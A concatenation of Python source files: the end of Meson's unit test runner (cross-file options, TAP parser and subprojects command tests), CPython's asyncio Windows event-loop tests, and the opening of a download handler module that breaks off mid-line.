'-Ddef_sysconfdir=sysconfbar']) def test_cross_file_dirs_overriden(self): testcase = os.path.join(self.unit_test_dir, '60 native file override') self.init(testcase, default_args=False, extra_args=['--native-file', os.path.join(testcase, 'nativefile'), '--cross-file', os.path.join(testcase, 'crossfile'), '-Ddef_libdir=liblib', '-Dlibdir=liblib', '-Ddef_bindir=binbar', '-Ddef_datadir=databar', '-Ddef_includedir=includebar', '-Ddef_infodir=infobar', '-Ddef_libexecdir=libexecbar', '-Ddef_localedir=localebar', '-Ddef_localstatedir=localstatebar', '-Ddef_mandir=manbar', '-Ddef_sbindir=sbinbar', '-Ddef_sharedstatedir=sharedstatebar', '-Ddef_sysconfdir=sysconfbar']) def test_cross_file_dirs_chain(self): # crossfile2 overrides crossfile overrides nativefile testcase = os.path.join(self.unit_test_dir, '60 native file override') self.init(testcase, default_args=False, extra_args=['--native-file', os.path.join(testcase, 'nativefile'), '--cross-file', os.path.join(testcase, 'crossfile'), '--cross-file', 
os.path.join(testcase, 'crossfile2'), '-Ddef_bindir=binbar2', '-Ddef_datadir=databar', '-Ddef_includedir=includebar', '-Ddef_infodir=infobar', '-Ddef_libdir=libbar', '-Ddef_libexecdir=libexecbar', '-Ddef_localedir=localebar', '-Ddef_localstatedir=localstatebar', '-Ddef_mandir=manbar', '-Ddef_sbindir=sbinbar', '-Ddef_sharedstatedir=sharedstatebar', '-Ddef_sysconfdir=sysconfbar']) def test_user_options(self): # This is just a touch test for cross file, since the implementation # shares code after loading from the files testcase = os.path.join(self.common_test_dir, '41 options') config = self.helper_create_cross_file({'project options': {'testoption': 'some other value'}}) with self.assertRaises(subprocess.CalledProcessError) as cm: self.init(testcase, extra_args=['--cross-file', config]) self.assertRegex(cm.exception.stdout, r'Incorrect value to [a-z]+ option') def test_builtin_options(self): testcase = os.path.join(self.common_test_dir, '2 cpp') config = self.helper_create_cross_file({'built-in options': {'cpp_std': 'c++14'}}) self.init(testcase, extra_args=['--cross-file', config]) configuration = self.introspect('--buildoptions') for each in configuration: if each['name'] == 'cpp_std': self.assertEqual(each['value'], 'c++14') break else: self.fail('No c++ standard set?') def test_builtin_options_per_machine(self): """Test options that are allowed to be set on a per-machine basis. Such options could be passed twice, once for the build machine, and once for the host machine. I've picked pkg-config path, but any would do that can be set for both. """ testcase = os.path.join(self.common_test_dir, '2 cpp') cross = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/cross/path', 'cpp_std': 'c++17'}}) native = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/native/path', 'cpp_std': 'c++14'}}) # Ensure that PKG_CONFIG_PATH is not set in the environment with mock.patch.dict('os.environ'): for k in ['PKG_CONFIG_PATH', 'PKG_CONFIG_PATH_FOR_BUILD']: try: del os.environ[k] except KeyError: pass self.init(testcase, extra_args=['--cross-file', cross, '--native-file', native]) configuration = self.introspect('--buildoptions') found = 0 for each in configuration: if each['name'] == 'pkg_config_path': self.assertEqual(each['value'], ['/cross/path']) found += 1 elif each['name'] == 'cpp_std': self.assertEqual(each['value'], 'c++17') found += 1 elif each['name'] == 'build.pkg_config_path': self.assertEqual(each['value'], ['/native/path']) found += 1 elif each['name'] == 'build.cpp_std': self.assertEqual(each['value'], 'c++14') found += 1 if found == 4: break self.assertEqual(found, 4, 'Did not find all sections.') def test_builtin_options_conf_overrides_env(self): testcase = os.path.join(self.common_test_dir, '2 cpp') config = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/native'}}) cross = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/cross'}}) self.init(testcase, extra_args=['--native-file', config, '--cross-file', cross], override_envvars={'PKG_CONFIG_PATH': '/bar', 'PKG_CONFIG_PATH_FOR_BUILD': '/dir'}) configuration = self.introspect('--buildoptions') found = 0 for each in configuration: if each['name'] == 'pkg_config_path': self.assertEqual(each['value'], ['/cross']) found += 1 elif each['name'] == 'build.pkg_config_path': self.assertEqual(each['value'], ['/native']) found += 1 if found == 2: break self.assertEqual(found, 2, 'Did not find all sections.') class TAPParserTests(unittest.TestCase): def 
assert_test(self, events, **kwargs): if 'explanation' not in kwargs: kwargs['explanation'] = None self.assertEqual(next(events), TAPParser.Test(**kwargs)) def assert_plan(self, events, **kwargs): if 'skipped' not in kwargs: kwargs['skipped'] = False if 'explanation' not in kwargs: kwargs['explanation'] = None self.assertEqual(next(events), TAPParser.Plan(**kwargs)) def assert_version(self, events, **kwargs): self.assertEqual(next(events), TAPParser.Version(**kwargs)) def assert_error(self, events): self.assertEqual(type(next(events)), TAPParser.Error) def assert_bailout(self, events, **kwargs): self.assertEqual(next(events), TAPParser.Bailout(**kwargs)) def assert_last(self, events): with self.assertRaises(StopIteration): next(events) def parse_tap(self, s): parser = TAPParser(io.StringIO(s)) return iter(parser.parse()) def parse_tap_v13(self, s): events = self.parse_tap('TAP version 13\n' + s) self.assert_version(events, version=13) return events def test_empty(self): events = self.parse_tap('') self.assert_last(events) def test_empty_plan(self): events = self.parse_tap('1..0') self.assert_plan(events, count=0, late=False, skipped=True) self.assert_last(events) def test_plan_directive(self): events = self.parse_tap('1..0 # skipped for some reason') self.assert_plan(events, count=0, late=False, skipped=True, explanation='for some reason') self.assert_last(events) events = self.parse_tap('1..1 # skipped for some reason\nok 1') self.assert_error(events) self.assert_plan(events, count=1, late=False, skipped=True, explanation='for some reason') self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_last(events) events = self.parse_tap('1..1 # todo not supported here\nok 1') self.assert_error(events) self.assert_plan(events, count=1, late=False, skipped=False, explanation='not supported here') self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_last(events) def test_one_test_ok(self): events = self.parse_tap('ok') self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_last(events) def test_one_test_with_number(self): events = self.parse_tap('ok 1') self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_last(events) def test_one_test_with_name(self): events = self.parse_tap('ok 1 abc') self.assert_test(events, number=1, name='abc', result=TestResult.OK) self.assert_last(events) def test_one_test_not_ok(self): events = self.parse_tap('not ok') self.assert_test(events, number=1, name='', result=TestResult.FAIL) self.assert_last(events) def test_one_test_todo(self): events = self.parse_tap('not ok 1 abc # TODO') self.assert_test(events, number=1, name='abc', result=TestResult.EXPECTEDFAIL) self.assert_last(events) events = self.parse_tap('ok 1 abc # TODO') self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS) self.assert_last(events) def test_one_test_skip(self): events = self.parse_tap('ok 1 abc # SKIP') self.assert_test(events, number=1, name='abc', result=TestResult.SKIP) self.assert_last(events) def test_one_test_skip_failure(self): events = self.parse_tap('not ok 1 abc # SKIP') self.assert_test(events, number=1, name='abc', result=TestResult.FAIL) self.assert_last(events) def test_many_early_plan(self): events = self.parse_tap('1..4\nok 1\nnot ok 2\nok 3\nnot ok 4') self.assert_plan(events, count=4, late=False) self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_test(events, number=2, name='', result=TestResult.FAIL) self.assert_test(events, 
number=3, name='', result=TestResult.OK) self.assert_test(events, number=4, name='', result=TestResult.FAIL) self.assert_last(events) def test_many_late_plan(self): events = self.parse_tap('ok 1\nnot ok 2\nok 3\nnot ok 4\n1..4') self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_test(events, number=2, name='', result=TestResult.FAIL) self.assert_test(events, number=3, name='', result=TestResult.OK) self.assert_test(events, number=4, name='', result=TestResult.FAIL) self.assert_plan(events, count=4, late=True) self.assert_last(events) def test_directive_case(self): events = self.parse_tap('ok 1 abc # skip') self.assert_test(events, number=1, name='abc', result=TestResult.SKIP) self.assert_last(events) events = self.parse_tap('ok 1 abc # ToDo') self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS) self.assert_last(events) def test_directive_explanation(self): events = self.parse_tap('ok 1 abc # skip why') self.assert_test(events, number=1, name='abc', result=TestResult.SKIP, explanation='why') self.assert_last(events) events = self.parse_tap('ok 1 abc # ToDo Because') self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS, explanation='Because') self.assert_last(events) def test_one_test_early_plan(self): events = self.parse_tap('1..1\nok') self.assert_plan(events, count=1, late=False) self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_last(events) def test_one_test_late_plan(self): events = self.parse_tap('ok\n1..1') self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_plan(events, count=1, late=True) self.assert_last(events) def test_out_of_order(self): events = self.parse_tap('ok 2') self.assert_error(events) self.assert_test(events, number=2, name='', result=TestResult.OK) self.assert_last(events) def test_middle_plan(self): events = self.parse_tap('ok 1\n1..2\nok 2') self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_plan(events, count=2, late=True) self.assert_error(events) self.assert_test(events, number=2, name='', result=TestResult.OK) self.assert_last(events) def test_too_many_plans(self): events = self.parse_tap('1..1\n1..2\nok 1') self.assert_plan(events, count=1, late=False) self.assert_error(events) self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_last(events) def test_too_many(self): events = self.parse_tap('ok 1\nnot ok 2\n1..1') self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_test(events, number=2, name='', result=TestResult.FAIL) self.assert_plan(events, count=1, late=True) self.assert_error(events) self.assert_last(events) events = self.parse_tap('1..1\nok 1\nnot ok 2') self.assert_plan(events, count=1, late=False) self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_test(events, number=2, name='', result=TestResult.FAIL) self.assert_error(events) self.assert_last(events) def test_too_few(self): events = self.parse_tap('ok 1\nnot ok 2\n1..3') self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_test(events, number=2, name='', result=TestResult.FAIL) self.assert_plan(events, count=3, late=True) self.assert_error(events) self.assert_last(events) events = self.parse_tap('1..3\nok 1\nnot ok 2') self.assert_plan(events, count=3, late=False) self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_test(events, number=2, name='', result=TestResult.FAIL) self.assert_error(events) 
self.assert_last(events) def test_too_few_bailout(self): events = self.parse_tap('1..3\nok 1\nnot ok 2\nBail out! no third test') self.assert_plan(events, count=3, late=False) self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_test(events, number=2, name='', result=TestResult.FAIL) self.assert_bailout(events, message='no third test') self.assert_last(events) def test_diagnostics(self): events = self.parse_tap('1..1\n# ignored\nok 1') self.assert_plan(events, count=1, late=False) self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_last(events) events = self.parse_tap('# ignored\n1..1\nok 1\n# ignored too') self.assert_plan(events, count=1, late=False) self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_last(events) events = self.parse_tap('# ignored\nok 1\n1..1\n# ignored too') self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_plan(events, count=1, late=True) self.assert_last(events) def test_empty_line(self): events = self.parse_tap('1..1\n\nok 1') self.assert_plan(events, count=1, late=False) self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_last(events) def test_unexpected(self): events = self.parse_tap('1..1\ninvalid\nok 1') self.assert_plan(events, count=1, late=False) self.assert_error(events) self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_last(events) def test_version(self): events = self.parse_tap('TAP version 13\n') self.assert_version(events, version=13) self.assert_last(events) events = self.parse_tap('TAP version 12\n') self.assert_error(events) self.assert_last(events) events = self.parse_tap('1..0\nTAP version 13\n') self.assert_plan(events, count=0, late=False, skipped=True) self.assert_error(events) self.assert_last(events) def test_yaml(self): events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def\n ...\nok 2') self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_test(events, number=2, name='', result=TestResult.OK) self.assert_last(events) events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def') self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_error(events) self.assert_last(events) events = self.parse_tap_v13('ok 1\n ---\n foo: abc\n bar: def\nnot ok 2') self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_error(events) self.assert_test(events, number=2, name='', result=TestResult.FAIL) self.assert_last(events) class SubprojectsCommandTests(BasePlatformTests): def setUp(self): super().setUp() self.root_dir = Path(self.builddir) self.project_dir = self.root_dir / 'src' self._create_project(self.project_dir) self.subprojects_dir = self.project_dir / 'subprojects' os.makedirs(str(self.subprojects_dir)) def _create_project(self, path, project_name='dummy'): os.makedirs(str(path), exist_ok=True) with open(str(path / 'meson.build'), 'w') as f: f.write("project('{}')".format(project_name)) def _git(self, cmd, workdir): return git(cmd, str(workdir), check=True)[1].strip() def _git_config(self, workdir): self._git(['config', 'user.name', 'Meson Test'], workdir) self._git(['config', 'user.email', 'meson.test@example.com'], workdir) def _git_remote(self, cmd, name): return self._git(cmd, self.root_dir / name) def _git_local(self, cmd, name): return self._git(cmd, self.subprojects_dir / name) def _git_local_branch(self, name): # Same as `git branch --show-current` but compatible with older git version branch = 
self._git_local(['rev-parse', '--abbrev-ref', 'HEAD'], name) return branch if branch != 'HEAD' else '' def _git_local_commit(self, name, ref='HEAD'): return self._git_local(['rev-parse', ref], name) def _git_remote_commit(self, name, ref='HEAD'): return self._git_remote(['rev-parse', ref], name) def _git_create_repo(self, path): # If a user has git configuration init.defaultBranch set we want to override that with tempfile.TemporaryDirectory() as d: out = git(['--version'], str(d))[1] if version_compare(mesonbuild.environment.search_version(out), '>= 2.28'): extra_cmd = ['--initial-branch', 'master'] else: extra_cmd = [] self._create_project(path) self._git(['init'] + extra_cmd, path) self._git_config(path) self._git(['add', '.'], path) self._git(['commit', '-m', 'Initial commit'], path) def _git_create_remote_repo(self, name): self._git_create_repo(self.root_dir / name) def _git_create_local_repo(self, name): self._git_create_repo(self.subprojects_dir / name) def _git_create_remote_commit(self, name, branch): self._git_remote(['checkout', branch], name) self._git_remote(['commit', '--allow-empty', '-m', 'initial {} commit'.format(branch)], name) def _git_create_remote_branch(self, name, branch): self._git_remote(['checkout', '-b', branch], name) self._git_remote(['commit', '--allow-empty', '-m', 'initial {} commit'.format(branch)], name) def _git_create_remote_tag(self, name, tag): self._git_remote(['commit', '--allow-empty', '-m', 'tag {} commit'.format(tag)], name) self._git_remote(['tag', tag], name) def _wrap_create_git(self, name, revision='master'): path = self.root_dir / name with open(str((self.subprojects_dir / name).with_suffix('.wrap')), 'w') as f: f.write(textwrap.dedent( ''' [wrap-git] url={} revision={} '''.format(os.path.abspath(str(path)), revision))) def _wrap_create_file(self, name, tarball='dummy.tar.gz'): path = self.root_dir / tarball with open(str((self.subprojects_dir / name).with_suffix('.wrap')), 'w') as f: f.write(textwrap.dedent( ''' [wrap-file] source_url={} '''.format(os.path.abspath(str(path))))) def _subprojects_cmd(self, args): return self._run(self.meson_command + ['subprojects'] + args, workdir=str(self.project_dir)) def test_git_update(self): subp_name = 'sub1' # Create a fake remote git repository and a wrap file. Checks that # "meson subprojects download" works. self._git_create_remote_repo(subp_name) self._wrap_create_git(subp_name) self._subprojects_cmd(['download']) self.assertPathExists(str(self.subprojects_dir / subp_name)) self._git_config(self.subprojects_dir / subp_name) # Create a new remote branch and update the wrap file. Checks that # "meson subprojects update --reset" checkout the new branch. self._git_create_remote_branch(subp_name, 'newbranch') self._wrap_create_git(subp_name, 'newbranch') self._subprojects_cmd(['update', '--reset']) self.assertEqual(self._git_local_branch(subp_name), 'newbranch') self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newbranch')) # Update remote newbranch. Checks the new commit is pulled into existing # local newbranch. Make sure it does not print spurious 'git stash' message. self._git_create_remote_commit(subp_name, 'newbranch') out = self._subprojects_cmd(['update', '--reset']) self.assertNotIn('No local changes to save', out) self.assertEqual(self._git_local_branch(subp_name), 'newbranch') self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newbranch')) # Update remote newbranch and switch to another branch. 
Checks that it # switch current branch to newbranch and pull latest commit. self._git_local(['checkout', 'master'], subp_name) self._git_create_remote_commit(subp_name, 'newbranch') self._subprojects_cmd(['update', '--reset']) self.assertEqual(self._git_local_branch(subp_name), 'newbranch') self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newbranch')) # Stage some local changes then update. Checks that local changes got # stashed. self._create_project(self.subprojects_dir / subp_name, 'new_project_name') self._git_local(['add', '.'], subp_name) self._git_create_remote_commit(subp_name, 'newbranch') self._subprojects_cmd(['update', '--reset']) self.assertEqual(self._git_local_branch(subp_name), 'newbranch') self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newbranch')) self.assertTrue(self._git_local(['stash', 'list'], subp_name)) # Create a new remote tag and update the wrap file. Checks that # "meson subprojects update --reset" checkout the new tag in detached mode. self._git_create_remote_tag(subp_name, 'newtag') self._wrap_create_git(subp_name, 'newtag') self._subprojects_cmd(['update', '--reset']) self.assertEqual(self._git_local_branch(subp_name), '') self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newtag')) # Create a new remote commit and update the wrap file with the commit id. # Checks that "meson subprojects update --reset" checkout the new commit # in detached mode. self._git_local(['checkout', 'master'], subp_name) self._git_create_remote_commit(subp_name, 'newbranch') new_commit = self._git_remote(['rev-parse', 'HEAD'], subp_name) self._wrap_create_git(subp_name, new_commit) self._subprojects_cmd(['update', '--reset']) self.assertEqual(self._git_local_branch(subp_name), '') self.assertEqual(self._git_local_commit(subp_name), new_commit) # Create a local project not in a git repository, then update it with # a git wrap. Without --reset it should print error message and return # failure. With --reset it should delete existing project and clone the # new project. 
subp_name = 'sub2' self._create_project(self.subprojects_dir / subp_name) self._git_create_remote_repo(subp_name) self._wrap_create_git(subp_name) with self.assertRaises(subprocess.CalledProcessError) as cm: self._subprojects_cmd(['update']) self.assertIn('Not a git repository', cm.exception.output) self._subprojects_cmd(['update', '--reset']) self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name)) @skipIfNoExecutable('true') def test_foreach(self): self._create_project(self.subprojects_dir / 'sub_file') self._wrap_create_file('sub_file') self._git_create_local_repo('sub_git') self._wrap_create_git('sub_git') self._git_create_local_repo('sub_git_no_wrap') def ran_in(s): ret = [] prefix = 'Executing command in ' for l in s.splitlines(): if l.startswith(prefix): ret.append(l[len(prefix):]) return sorted(ret) dummy_cmd = ['true'] out = self._subprojects_cmd(['foreach'] + dummy_cmd) self.assertEqual(ran_in(out), sorted(['subprojects/sub_file', 'subprojects/sub_git', 'subprojects/sub_git_no_wrap'])) out = self._subprojects_cmd(['foreach', '--types', 'git,file'] + dummy_cmd) self.assertEqual(ran_in(out), sorted(['subprojects/sub_file', 'subprojects/sub_git'])) out = self._subprojects_cmd(['foreach', '--types', 'file'] + dummy_cmd) self.assertEqual(ran_in(out), ['subprojects/sub_file']) out = self._subprojects_cmd(['foreach', '--types', 'git'] + dummy_cmd) self.assertEqual(ran_in(out), ['subprojects/sub_git']) def _clang_at_least(compiler, minver: str, apple_minver: str) -> bool: """ check that Clang compiler is at least a specified version, whether AppleClang or regular Clang Parameters ---------- compiler: Meson compiler object minver: str Clang minimum version apple_minver: str AppleCLang minimum version Returns ------- at_least: bool Clang is at least the specified version """ if isinstance(compiler, (mesonbuild.compilers.AppleClangCCompiler, mesonbuild.compilers.AppleClangCPPCompiler)): return version_compare(compiler.version, apple_minver) return version_compare(compiler.version, minver) def unset_envs(): # For unit tests we must fully control all command lines # so that there are no unexpected changes coming from the # environment, for example when doing a package build. varnames = ['CPPFLAGS', 'LDFLAGS'] + list(mesonbuild.compilers.compilers.cflags_mapping.values()) for v in varnames: if v in os.environ: del os.environ[v] def convert_args(argv): # If we got passed a list of tests, pass it on pytest_args = ['-v'] if '-v' in argv else [] test_list = [] for arg in argv: if arg.startswith('-'): if arg in ('-f', '--failfast'): arg = '--exitfirst' pytest_args.append(arg) continue # ClassName.test_name => 'ClassName and test_name' if '.' in arg: arg = ' and '.join(arg.split('.')) test_list.append(arg) if test_list: pytest_args += ['-k', ' or '.join(test_list)] return pytest_args def running_single_tests(argv, cases): ''' Check whether we only got arguments for running individual tests, not entire testcases, and not all testcases (no test args). ''' got_test_arg = False for arg in argv: if arg.startswith('-'): continue for case in cases: if not arg.startswith(case): continue if '.' 
not in arg: # Got a testcase, done return False got_test_arg = True return got_test_arg def main(): unset_envs() cases = ['InternalTests', 'DataTests', 'AllPlatformTests', 'FailureTests', 'PythonTests', 'NativeFileTests', 'RewriterTests', 'CrossFileTests', 'TAPParserTests', 'SubprojectsCommandTests', 'LinuxlikeTests', 'LinuxCrossArmTests', 'LinuxCrossMingwTests', 'WindowsTests', 'DarwinTests'] try: import pytest # noqa: F401 # Need pytest-xdist for `-n` arg import xdist # noqa: F401 pytest_args = [] # Don't use pytest-xdist when running single unit tests since it wastes # time spawning a lot of processes to distribute tests to in that case. if not running_single_tests(sys.argv, cases): pytest_args += ['-n', 'auto'] pytest_args += ['./run_unittests.py'] pytest_args += convert_args(sys.argv[1:]) return subprocess.run(python_command + ['-m', 'pytest'] + pytest_args).returncode except ImportError: print('pytest-xdist not found, using unittest instead') # Fallback to plain unittest. return unittest.main(defaultTest=cases, buffer=True) if __name__ == '__main__': print('Meson build system', mesonbuild.coredata.version, 'Unit Tests') start = time.monotonic() try: raise SystemExit(main()) finally: print('Total time: {:.3f} seconds'.format(time.monotonic() - start))
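The TAPParserTests earlier in this file drive the parser event stream directly. As a usage illustration only (not part of the test suite), the sketch below tallies results from a TAP stream; it assumes the TAPParser and TestResult names already imported by this file, and summarize_tap itself is a hypothetical helper.

# Hypothetical helper, assuming TAPParser and TestResult are available as in the tests above.
import io

def summarize_tap(text):
    """Count TAP test results by outcome (illustrative sketch only)."""
    parser = TAPParser(io.StringIO(text))
    counts = {}
    for event in parser.parse():
        # Only Test events carry a result; Plan/Version/Error events are skipped here.
        if isinstance(event, TAPParser.Test):
            counts[event.result] = counts.get(event.result, 0) + 1
    return counts

# Example: summarize_tap('1..2\nok 1\nnot ok 2') would count one TestResult.OK
# and one TestResult.FAIL, mirroring the assertions in test_many_early_plan.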
test_windows_events.py
import os import signal import socket import sys import time import threading import unittest from unittest import mock if sys.platform != 'win32': raise unittest.SkipTest('Windows only') import _overlapped import _winapi import asyncio from asyncio import windows_events from test.test_asyncio import utils as test_utils def tearDownModule(): asyncio.set_event_loop_policy(None) class UpperProto(asyncio.Protocol): def __init__(self): self.buf = [] def connection_made(self, trans): self.trans = trans def data_received(self, data): self.buf.append(data) if b'\n' in data: self.trans.write(b''.join(self.buf).upper()) self.trans.close() class ProactorLoopCtrlC(test_utils.TestCase): def test_ctrl_c(self): def SIGINT_after_delay(): time.sleep(0.1) signal.raise_signal(signal.SIGINT) thread = threading.Thread(target=SIGINT_after_delay) loop = asyncio.get_event_loop() try: # only start the loop once the event loop is running loop.call_soon(thread.start) loop.run_forever() self.fail("should not fall through 'run_forever'") except KeyboardInterrupt: pass finally: self.close_loop(loop) thread.join() class ProactorMultithreading(test_utils.TestCase): def test_run_from_nonmain_thread(self): finished = False async def coro(): await asyncio.sleep(0) def func(): nonlocal finished loop = asyncio.new_event_loop() loop.run_until_complete(coro()) # close() must not call signal.set_wakeup_fd() loop.close() finished = True thread = threading.Thread(target=func) thread.start() thread.join() self.assertTrue(finished) class ProactorTests(test_utils.TestCase): def setUp(self): super().setUp() self.loop = asyncio.ProactorEventLoop() self.set_event_loop(self.loop) def test_close(self): a, b = socket.socketpair() trans = self.loop._make_socket_transport(a, asyncio.Protocol()) f = asyncio.ensure_future(self.loop.sock_recv(b, 100), loop=self.loop) trans.close() self.loop.run_until_complete(f) self.assertEqual(f.result(), b'') b.close() def test_double_bind(self): ADDRESS = r'\\.\pipe\test_double_bind-%s' % os.getpid() server1 = windows_events.PipeServer(ADDRESS) with self.assertRaises(PermissionError): windows_events.PipeServer(ADDRESS) server1.close() def test_pipe(self): res = self.loop.run_until_complete(self._test_pipe()) self.assertEqual(res, 'done') async def _test_pipe(self): ADDRESS = r'\\.\pipe\_test_pipe-%s' % os.getpid() with self.assertRaises(FileNotFoundError): await self.loop.create_pipe_connection( asyncio.Protocol, ADDRESS) [server] = await self.loop.start_serving_pipe( UpperProto, ADDRESS) self.assertIsInstance(server, windows_events.PipeServer) clients = [] for i in range(5): stream_reader = asyncio.StreamReader(loop=self.loop) protocol = asyncio.StreamReaderProtocol(stream_reader, loop=self.loop) trans, proto = await self.loop.create_pipe_connection( lambda: protocol, ADDRESS) self.assertIsInstance(trans, asyncio.Transport) self.assertEqual(protocol, proto) clients.append((stream_reader, trans)) for i, (r, w) in enumerate(clients): w.write('lower-{}\n'.format(i).encode()) for i, (r, w) in enumerate(clients): response = await r.readline() self.assertEqual(response, 'LOWER-{}\n'.format(i).encode()) w.close() server.close() with self.assertRaises(FileNotFoundError): await self.loop.create_pipe_connection( asyncio.Protocol, ADDRESS) return 'done' def test_connect_pipe_cancel(self): exc = OSError() exc.winerror = _overlapped.ERROR_PIPE_BUSY with mock.patch.object(_overlapped, 'ConnectPipe', side_effect=exc) as connect: coro = self.loop._proactor.connect_pipe('pipe_address') task = self.loop.create_task(coro) # 
check that it's possible to cancel connect_pipe() task.cancel() with self.assertRaises(asyncio.CancelledError): self.loop.run_until_complete(task) def test_wait_for_handle(self): event = _overlapped.CreateEvent(None, True, False, None) self.addCleanup(_winapi.CloseHandle, event) # Wait for unset event with 0.5s timeout; # result should be False at timeout fut = self.loop._proactor.wait_for_handle(event, 0.5) start = self.loop.time() done = self.loop.run_until_complete(fut) elapsed = self.loop.time() - start self.assertEqual(done, False) self.assertFalse(fut.result()) # bpo-31008: Tolerate only 450 ms (at least 500 ms expected), # because of bad clock resolution on Windows self.assertTrue(0.45 <= elapsed <= 0.9, elapsed) _overlapped.SetEvent(event) # Wait for set event; # result should be True immediately fut = self.loop._proactor.wait_for_handle(event, 10) start = self.loop.time() done = self.loop.run_until_complete(fut) elapsed = self.loop.time() - start self.assertEqual(done, True) self.assertTrue(fut.result()) self.assertTrue(0 <= elapsed < 0.3, elapsed) # asyncio issue #195: cancelling a done _WaitHandleFuture # must not crash fut.cancel() def test_wait_for_handle_cancel(self): event = _overlapped.CreateEvent(None, True, False, None) self.addCleanup(_winapi.CloseHandle, event) # Wait for unset event with a cancelled future; # CancelledError should be raised immediately fut = self.loop._proactor.wait_for_handle(event, 10) fut.cancel() start = self.loop.time() with self.assertRaises(asyncio.CancelledError): self.loop.run_until_complete(fut) elapsed = self.loop.time() - start self.assertTrue(0 <= elapsed < 0.1, elapsed) # asyncio issue #195: cancelling a _WaitHandleFuture twice # must not crash fut = self.loop._proactor.wait_for_handle(event) fut.cancel() fut.cancel() def test_read_self_pipe_restart(self): # Regression test for https://bugs.python.org/issue39010 # Previously, restarting a proactor event loop in certain states # would lead to spurious ConnectionResetErrors being logged. self.loop.call_exception_handler = mock.Mock() # Start an operation in another thread so that the self-pipe is used. # This is theoretically timing-dependent (the task in the executor # must complete before our start/stop cycles), but in practice it # seems to work every time. f = self.loop.run_in_executor(None, lambda: None) self.loop.stop() self.loop.run_forever() self.loop.stop() self.loop.run_forever() # Shut everything down cleanly. This is an important part of the # test - in issue 39010, the error occurred during loop.close(), # so we want to close the loop during the test instead of leaving # it for tearDown. # # First wait for f to complete to avoid a "future's result was never # retrieved" error. self.loop.run_until_complete(f) # Now shut down the loop itself (self.close_loop also shuts down the # loop's default executor). 
self.close_loop(self.loop) self.assertFalse(self.loop.call_exception_handler.called) class WinPolicyTests(test_utils.TestCase): def test_selector_win_policy(self): async def main(): self.assertIsInstance( asyncio.get_running_loop(), asyncio.SelectorEventLoop) old_policy = asyncio.get_event_loop_policy() try: asyncio.set_event_loop_policy( asyncio.WindowsSelectorEventLoopPolicy()) asyncio.run(main()) finally: asyncio.set_event_loop_policy(old_policy) def test_proactor_win_policy(self): async def main(): self.assertIsInstance( asyncio.get_running_loop(), asyncio.ProactorEventLoop) old_policy = asyncio.get_event_loop_policy() try: asyncio.set_event_loop_policy( asyncio.WindowsProactorEventLoopPolicy()) asyncio.run(main()) finally: asyncio.set_event_loop_policy(old_policy) if __name__ == '__main__': unittest.main()
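For reference, a minimal standalone sketch of the policy switch that WinPolicyTests verifies; the function names here are made up and the snippet is not part of the test module.

# Illustrative sketch only: selecting the proactor policy explicitly before asyncio.run().
async def _policy_demo():
    # On Windows the proactor loop is required for subprocess and pipe support.
    assert isinstance(asyncio.get_running_loop(), asyncio.ProactorEventLoop)

def run_policy_demo():
    old_policy = asyncio.get_event_loop_policy()
    try:
        asyncio.set_event_loop_policy(asyncio.WindowsProactorEventLoopPolicy())
        asyncio.run(_policy_demo())
    finally:
        # Restore whatever policy was active before, as the tests above do.
        asyncio.set_event_loop_policy(old_policy)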
DLHandler.py
import logging from DLInfos import * from DLProgress import * from packer import Packer import time, os LOG_FORMAT = "%(asctime)s,%(msecs)03d - %(levelname)s - %(threadName)-12s - (%(progress)s)[%(urlid)s] - %(message)s" logging.basicConfig(format=LOG_FORMAT, datefmt="%m/%d/%Y %H:%M:%S", level=logging.CRITICAL) logger = logging.getLogger('nbdler') __URL_NODE_PARAMS__ = { 'urls': 'url', 'cookies': 'cookie', 'hosts': 'host', 'ports': 'port', 'paths': 'path', 'headers': 'headers', 'max_threads': 'max_thread' } class Handler(Packer, object): def __init__(self): self.url = UrlPool() self.file = File() self.__globalprog__ = GlobalProgress(self, AUTO) self.__new_project__ = True self.__batch_thread__ = None self.globalprog = self.__globalprog__ def uninstall(self): self.globalprog = self.__globalprog__ def install(self, GlobalProgress): self.globalprog = GlobalProgress def __batchAdd__(self, pack_yield): for iter_kw in pack_yield: self.addNode(**iter_kw) def batchAdd(self, wait=True, **kwargs): global __URL_NODE_PARAMS__ pack_yield = [] iter_len = len(kwargs.get('urls', [])) for i in range(iter_len): node = {} for m, n in __URL_NODE_PARAMS__.items(): if m in kwargs: if len(kwargs[m]) == 1: node[n] = kwargs[m][0] elif 